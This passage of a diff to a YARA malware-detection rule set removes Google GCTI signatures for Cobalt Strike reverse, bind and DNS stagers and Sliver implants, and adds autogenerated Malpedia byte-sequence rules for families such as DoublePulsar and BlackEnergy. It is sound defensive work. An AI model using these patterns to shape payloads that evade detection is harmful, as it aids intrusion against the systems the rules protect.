8bb5a8efffff 85f6 0f84ce000000 6808020000 8d85e8fdffff } + $sequence_3 = { 8d4dac e8???????? 8d4dc8 e8???????? 8d8d74ffffff c645fc1b e8???????? } + $sequence_4 = { 8bc2 b9ffffff7f 83c80f 3dffffff7f 0f47c1 894584 40 } + $sequence_5 = { 7cd5 33db 395d90 7650 0f1f4000 660f1f840000000000 83bd78ffffff10 } + $sequence_6 = { 6a02 68???????? e8???????? 8b8534efffff 83c618 8b8d4cefffff 40 } + $sequence_7 = { e8???????? 83c404 8b8780000000 33f6 89b534efffff } + $sequence_8 = { 6a01 8bce e8???????? 84c0 0f84c2feffff e9???????? 8b4778 } + $sequence_9 = { e8???????? 83c010 8906 51 c645fc25 8bf4 89b508fdffff } condition: - all of them + 7 of them and filesize <832512 } -rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X +rule MALPEDIA_Win_Darkshell_Auto : FILE { meta: - description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x" - author = "gssincla@google.com" - id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7" - logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "54238af5-7449-55bf-9dc2-08b5916a169b" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkshell_auto.yar#L1-L122" + license_url = "N/A" + logic_hash = "b58c1bc2e0988d2ff26125d2777445ac18dab56ca2991d83e57c5d570ae3c235" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $ws2_32 = { - 5D - 68 33 32 00 00 - 68 77 73 32 5F - } - $connect = { - 6A 10 - 5? - 5? - 68 99 A5 74 61 - } + $sequence_0 = { 83c004 8901 83c014 8902 6681380b01 7511 } + $sequence_1 = { 6a00 6a00 50 53 ffd5 8be8 } + $sequence_2 = { 7413 8b4c2410 8b54240c 51 52 ffd0 } + $sequence_3 = { ff542414 53 ff542414 56 ff15???????? } + $sequence_4 = { 8d542418 6a04 52 684be12200 50 } + $sequence_5 = { e8???????? 8b4c2414 8bf0 8b442418 6800400000 50 } + $sequence_6 = { 89442418 ffd7 6a00 6a00 6a00 6a00 } + $sequence_7 = { 55 ff542424 55 ff542414 53 } + $sequence_8 = { 8902 6681380b01 7511 8b4c2410 05e0000000 8901 b801000000 } + $sequence_9 = { ff15???????? 8b542410 8d4c2414 51 6a04 52 } condition: - $apiLocator and $ws2_32 and $connect + 7 of them and filesize <344064 } -rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X +rule MALPEDIA_Win_Mozart_Auto : FILE { meta: - description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x" - author = "gssincla@google.com" - id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1" - logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "1438b6f5-0fc9-5eca-9ae3-36eb59239394" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mozart_auto.yar#L1-L124" + license_url = "N/A" + logic_hash = "94b0456ee335dcdb1592bd3a0f2b861e74a91bd5433e8fc753965fb9891ac5e3" score = 75 - quality = 83 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $dnsapi = { 68 64 6E 73 61 } + $sequence_0 = { 7c26 80fb39 7f21 885c3418 46 } + $sequence_1 = { 66ab e8???????? 8d44242c 50 e8???????? 8d8c2430010000 51 } + $sequence_2 = { c1f805 8d1c85c0db4000 8b03 8bf1 83e61f c1e603 8a443004 } + $sequence_3 = { 49 7438 49 7471 c1e006 0bc7 } + $sequence_4 = { 55 8bec 83e4f8 81ec20020000 a1???????? 8b0d???????? 668b15???????? } + $sequence_5 = { 8bf0 83e61f 8d3c8dc0db4000 8b0f c1e603 f644310401 7455 } + $sequence_6 = { 8a08 40 84c9 75f9 8b8c2420100000 } + $sequence_7 = { 2bc7 3bf0 7202 33f6 8bc5 43 42 } + $sequence_8 = { 8b0a 83c502 3be9 7728 } + $sequence_9 = { 751a 84c0 7426 8b5608 47 } condition: - $apiLocator and $dnsapi + 7 of them and filesize <114688 } -rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X +rule MALPEDIA_Win_Bandit_Auto : FILE { meta: - description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x" - author = "gssincla@google.com" - id = "c16e73fc-484a-5f7e-8127-d85a0254d842" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573" - logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "4242f486-f361-5c1c-837c-874b9d2592eb" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bandit_auto.yar#L1-L134" + license_url = "N/A" + logic_hash = "e59306c04a92c7c36290cce1b84004757d2fea7b6a860dd6621dd5fc2300ad60" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 48 [2] - AC - 41 [2] 0D - 41 [2] - 38 ?? - 75 ?? - 4C [4] - 45 [2] - 75 ?? - 5? - 44 [2] 24 - 49 [2] - 66 [4] - 44 [2] 1C - 49 [2] - 41 [3] - 48 - } - $InternetSetOptionA = { - BA 1F 00 00 00 - 6A 00 - 68 80 33 00 00 - 49 [2] - 41 ?? 04 00 00 00 - 41 ?? 75 46 9E 86 - } + $sequence_0 = { e8???????? 488d0d9ca6a100 48894820 833d????????00 750b 488b4c2478 48894828 } + $sequence_1 = { c3 4889d0 e8???????? 84c0 744e 488b4c2428 488b11 } + $sequence_2 = { 83c301 4883c604 4501f1 e8???????? 4139df 75d6 8b742460 } + $sequence_3 = { e9???????? 488d5f01 4839da 731d 4889f0 4889d1 bf01000000 } + $sequence_4 = { e8???????? 48c7401801000000 488d0d1c9c5e00 48894810 4889c3 488d0530636a00 488b6c2440 } + $sequence_5 = { ffd2 4889442438 48895c2440 48894c2448 48897c2450 90 488b7c2430 } + $sequence_6 = { c644242701 488b4210 488b5c2428 488b4c2430 488b7c2438 6690 e8???????? } + $sequence_7 = { 8894249d000000 0fb654246c 4129d7 4488bc249e000000 0fb6542474 440fb6442425 4429c2 } + $sequence_8 = { e8???????? 4889d7 c60700 488d050e9a6b00 e8???????? 488b4c2438 488b542448 } + $sequence_9 = { c604085c 49f7d9 49c1f93f 4c8d5101 4d21ca 4e8d0c10 48f7df } condition: - $apiLocator and $InternetSetOptionA + 7 of them and filesize <29914112 } -rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X +rule MALPEDIA_Win_Pebbledash_Auto : FILE { meta: - description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x" - author = "gssincla@google.com" - id = "966e6e4c-85e2-5c94-8245-25367802b7d2" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8" - logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "3f16c34e-ab8c-5fd5-9a27-9934f8af2f6b" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pebbledash_auto.yar#L1-L129" + license_url = "N/A" + logic_hash = "477e05e2df7e0e436b23bf26c9707de6486fd65cc8fb3dc50d94f319663b31bc" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 48 [2] - AC - 41 [2] 0D - 41 [2] - 38 ?? - 75 ?? - 4C [4] - 45 [2] - 75 ?? - 5? - 44 [2] 24 - 49 [2] - 66 [4] - 44 [2] 1C - 49 [2] - 41 [3] - 48 - } - $calls = { - 48 89 C1 - 41 BA EA 0F DF E0 - FF D5 - 48 [2] - 6A ?? - 41 ?? - 4C [2] - 48 [2] - 41 BA 99 A5 74 61 - FF D5 - } + $sequence_0 = { 25ffff0000 3bd0 740a b800000004 e9???????? 83bd74fbffff00 751a } + $sequence_1 = { 8be5 5d c3 55 8bec 81ecd0000000 c68530ffffff8e } + $sequence_2 = { 51 e8???????? 83c418 8d55f0 52 8d85a4f3ffff 50 } + $sequence_3 = { 8d95a0f5ffff 52 ff15???????? 898594f7ffff 83bd94f7ffffff 7505 } + $sequence_4 = { a3???????? 833d????????00 742c 8b55f0 8955dc 8b45dc 8945e0 } + $sequence_5 = { 8d1c85609f4200 c1e603 8b03 f644300401 7469 57 } + $sequence_6 = { 8b08 8b550c 8b4110 8902 8d8d70feffff 51 8b550c } + $sequence_7 = { 8b45e8 83c001 8945e8 837de80e 733b } + $sequence_8 = { 51 e8???????? 83c40c 817d0c1e010000 7f15 837d101e } + $sequence_9 = { 8b55fc 0355e4 33c0 8a02 83f850 753b 8b4dfc } condition: - $apiLocator and $calls + 7 of them and filesize <360448 } -rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X +rule MALPEDIA_Win_Sslmm_Auto : FILE { meta: - description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x" - author = "gssincla@google.com" - id = "32f129c1-9845-5843-9e16-7d9af217b8e2" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1" - logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "66fe7984-4fbf-52ff-a40d-1ce2823f2352" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sslmm_auto.yar#L1-L120" + license_url = "N/A" + logic_hash = "d75465397d6b8b1866eed0e7ec1b8ff2d24536787a6f5113faf56887d0bb752f" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $ws2_32 = { - 5D - 68 33 32 00 00 - 68 77 73 32 5F - } - $listenaccept = { - 5? - 5? - 68 B7 E9 38 FF - FF ?? - 5? - 5? - 5? - 68 74 EC 3B E1 - } + $sequence_0 = { 89542440 8d4c2418 89442414 89542444 } + $sequence_1 = { 8b8c2484000000 8bbc2480000000 8b54247c 51 57 52 8bcb } + $sequence_2 = { 8b442438 89742418 89542468 89442460 8b44241c 33f6 8d542428 } + $sequence_3 = { e9???????? ff15???????? 50 eb13 5f 5e } + $sequence_4 = { 8b868c000000 68???????? 85c0 7413 6800000200 6a00 } + $sequence_5 = { 83c40c 899374010000 33ed 8b8374010000 } + $sequence_6 = { 83f8ff 0f8477020000 3bc5 0f84fb010000 8b9374010000 55 03d0 } + $sequence_7 = { 83c414 3bc3 770a 6a0a } + $sequence_8 = { 8db120010000 8b780c 42 897814 8b7808 897810 } + $sequence_9 = { 8b7c2424 e9???????? 50 8bcf eb2e } condition: - $apiLocator and $ws2_32 and $listenaccept + 7 of them and filesize <188416 } -rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X +rule MALPEDIA_Win_Gspy_Auto : FILE { meta: - description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x" - author = "gssincla@google.com" - id = "f45aa40a-3936-50f9-a60e-de7181862d19" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3" - logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "3f030d66-0807-5220-809f-f602620cbb65" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gspy_auto.yar#L1-L131" + license_url = "N/A" + logic_hash = "74604d1b3decfab056910daf59a9f74fcce729f63057c78e0ce83dfa1bab2af0" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $InternetSetOptionA = { - 6A 04 - 5? - 6A 1F - 5? - 68 75 46 9E 86 - FF - } + $sequence_0 = { 57 52 c70600000000 ff15???????? 8b4608 8b1d???????? 85c0 } + $sequence_1 = { 50 8d4c242c 51 e8???????? c744240812000000 eb2f 6a1c } + $sequence_2 = { 8d4c2404 51 6a00 50 ff15???????? a3???????? 85c0 } + $sequence_3 = { 8b542420 51 57 6800000220 52 e8???????? } + $sequence_4 = { ff15???????? 85c0 0f8408010000 56 57 50 e8???????? } + $sequence_5 = { 85f6 0f8434ffffff 83f8ff 750d 33c0 3806 } + $sequence_6 = { 0f87b0000000 833e00 89742410 76b3 8b4604 a900000c00 } + $sequence_7 = { 0f83ed000000 6a10 6a00 8d442440 50 e8???????? c744241468be4200 } + $sequence_8 = { 03cb 51 03d6 52 e8???????? 013e eb08 } + $sequence_9 = { 6801000080 c744242000000000 c744241c04000000 c744241801000080 83ceff ff15???????? 85c0 } condition: - $apiLocator and $InternetSetOptionA + 7 of them and filesize <421888 } -rule GCTI_Sliver_Implant_64Bit +rule MALPEDIA_Win_Doublepulsar_Auto : FILE { meta: - description = "Sliver 64-bit implant (with and without --debug flag at compile)" - author = "gssincla@google.com" - id = "b84db933-0e11-5871-821d-43697c015665" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_64bit.yara#L17-L84" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87" - logic_hash = "ad4ceef08a732174c8ccbcacf0370b26acb9e5ec0784d8827c8104618e018a26" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "e4212e3d-0371-55d3-984d-e0909a78bc0f" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublepulsar_auto.yar#L1-L175" + license_url = "N/A" + logic_hash = "dd8758cb2c036e196362248313c65a128ef51c3148638e90157034cf0392e7be" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 } - $s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 } - $s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 } - $s_wg = {66 81 ?? 77 67} - $s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 } - $s_mtls = { 81 ?? 6D 74 6C 73 } - $fp1 = "cloudfoundry" ascii fullword + $sequence_0 = { 731b 8a44144d 8d7c244c 8844144c } + $sequence_1 = { 8d41ff 85c0 7c10 8a1430 80fa5c 7408 } + $sequence_2 = { 8bc1 8bf7 8bfa 89ac245c020000 c1e902 f3a5 8b542410 } + $sequence_3 = { 0f8423010000 8b13 68???????? 52 ffd6 83c408 85c0 } + $sequence_4 = { e8???????? 48 8b4520 48 8b4878 48 } + $sequence_5 = { 5b 81c4c8040000 c20800 a0???????? } + $sequence_6 = { 8bc3 5f 5e 5b c3 b8???????? 83f901 } + $sequence_7 = { 83c410 85c0 740a 68???????? e9???????? 8b442408 53 } + $sequence_8 = { 53 33c0 56 8b742420 } + $sequence_9 = { 83c151 57 51 ff5618 85c0 7404 31c0 } + $sequence_10 = { ffd6 83c408 85c0 0f84990e0000 8b03 68???????? } + $sequence_11 = { 7414 8b5640 8b4c2414 52 51 } + $sequence_12 = { 55 e8???????? 8bd8 85db 0f84a0000000 56 } + $sequence_13 = { 33c0 bade47773f 8d4848 f3aa } + $sequence_14 = { c1ea18 33c3 8b1c95f0354000 8b56fc 33c3 8b1c8df0414000 } + $sequence_15 = { 52 ff15???????? 8b4518 83c404 85c0 7517 a1???????? } condition: - 5 of ($s*) and not 1 of ($fp*) + 7 of them and filesize <140288 } -rule GCTI_Sliver_Implant_32Bit +rule MALPEDIA_Win_Nullmixer_Auto : FILE { meta: - description = "Sliver 32-bit implant (with and without --debug flag at compile)" - author = "gssincla@google.com" - id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_32bit.yara#L17-L81" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357" - logic_hash = "5b394a198f691b6777438a69d20a423798525daa84a09a0ce346eca5bb66f850" - score = 60 - quality = 35 - tags = "" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "e761e8a0-6032-5175-8c62-373d3cfdbd32" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nullmixer_auto.yar#L1-L133" + license_url = "N/A" + logic_hash = "ff19905731e10511745fb317854603fdd089737424883a407ad871400c764a1f" + score = 75 + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74 } - $s_wg = { 66 81 ?? 77 67 } - $s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 } - $s_http = { 81 ?? 68 74 74 70 } - $s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 } - $s_mtls = { 81 ?? 6D 74 6C 73 } - $fp1 = "cloudfoundry" ascii fullword + $sequence_0 = { 6683fa05 0f8726010000 83e857 83f8ff 0f85d0fcffff 8d7600 } + $sequence_1 = { c7442404???????? c70424???????? c705????????d09d4a00 e8???????? c705????????01000000 83ec08 89d9 } + $sequence_2 = { a3???????? 8d8568feffff c7442408???????? c7442404???????? 890424 e8???????? 8d8568feffff } + $sequence_3 = { 8901 8d44241f 89442408 e8???????? 31d2 c7400800000000 83c00c } + $sequence_4 = { c784245001000000000000 31c9 e9???????? 8b8c2450010000 e8???????? b8ffffffff 8b94245c010000 } + $sequence_5 = { 01c9 896c2404 894c2408 890424 e8???????? e9???????? 8b442448 } + $sequence_6 = { 398424d0000000 0f8430050000 8b06 c744240400000000 89f1 0fb75502 891424 } + $sequence_7 = { 83f90f 0f4fc8 8b45a8 3975ac 19f8 0f82d0000000 8b55bc } + $sequence_8 = { 83ec04 837d8010 8d75b4 0f94c2 8b4808 39f9 894d8c } + $sequence_9 = { 89f1 e8???????? 8b06 89f1 c704242b000000 ff5018 52 } condition: - 4 of ($s*) and not 1 of ($fp*) + 7 of them and filesize <2351104 } -/* - * YARA Rule Set - * Repository Name: Malpedia - * Repository: https://github.com/malpedia/signator-rules/ - * Retrieval Date: 2024-09-08 - * Git Commit: fbacfc09b84d53d410385e66a8e56f25016c588a - * Number of Rules: 1382 - * Skipped: 0 (age), 15 (quality), 0 (score), 0 (importance) - * - * - * LICENSE - * - * NO LICENSE SET - */ -rule MALPEDIA_Win_Moonbounce_Auto : FILE +rule MALPEDIA_Win_Blackenergy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c186ffa8-3b28-566b-9f82-5819628ca523" + id = "5db0ecdd-a93d-527c-8567-cf3a04744f9e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moonbounce_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackenergy_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "081fa4bc70b28c3a98dc6caeb9104489e42b513d1d76e6dfbd571155c86ff551" + logic_hash = "0197d7c7455032dc4a706fe02d56c8be876c2f6b4f29a6658284a54a2993239d" score = 75 quality = 75 tags = "FILE" @@ -130080,32 +132782,32 @@ rule MALPEDIA_Win_Moonbounce_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7413 8d041e 85c0 0f8407feffff ff7704 6a01 } - $sequence_1 = { 3bfe 7426 56 56 56 56 } - $sequence_2 = { 6a04 6800200000 ff7650 50 ff5708 8bd8 85db } - $sequence_3 = { 8b5de8 5e 5f 8bc3 5b } - $sequence_4 = { 833800 7413 8345fc04 8b45fc 8b00 } - $sequence_5 = { 56 57 6a30 33ff 57 ff15???????? } - $sequence_6 = { a3???????? 3935???????? 7441 3935???????? } - $sequence_7 = { 8d45e8 50 ffd7 84c0 0f8482000000 } - $sequence_8 = { 8b400c 85c0 0f8495000000 03c3 50 ff570c } - $sequence_9 = { 3bfe 7426 56 56 56 56 68???????? } + $sequence_0 = { bb01000000 eb02 03d8 8bc2 e9???????? 8b4df4 014dd8 } + $sequence_1 = { 39750c 740c 56 56 ff7508 ff550c } + $sequence_2 = { 8b7df4 8b75f0 8b4d08 f3a4 a1???????? 33c9 3bc1 } + $sequence_3 = { e8???????? 2bc6 3bc7 760f 6bd20a 47 e8???????? } + $sequence_4 = { 0f848f000000 53 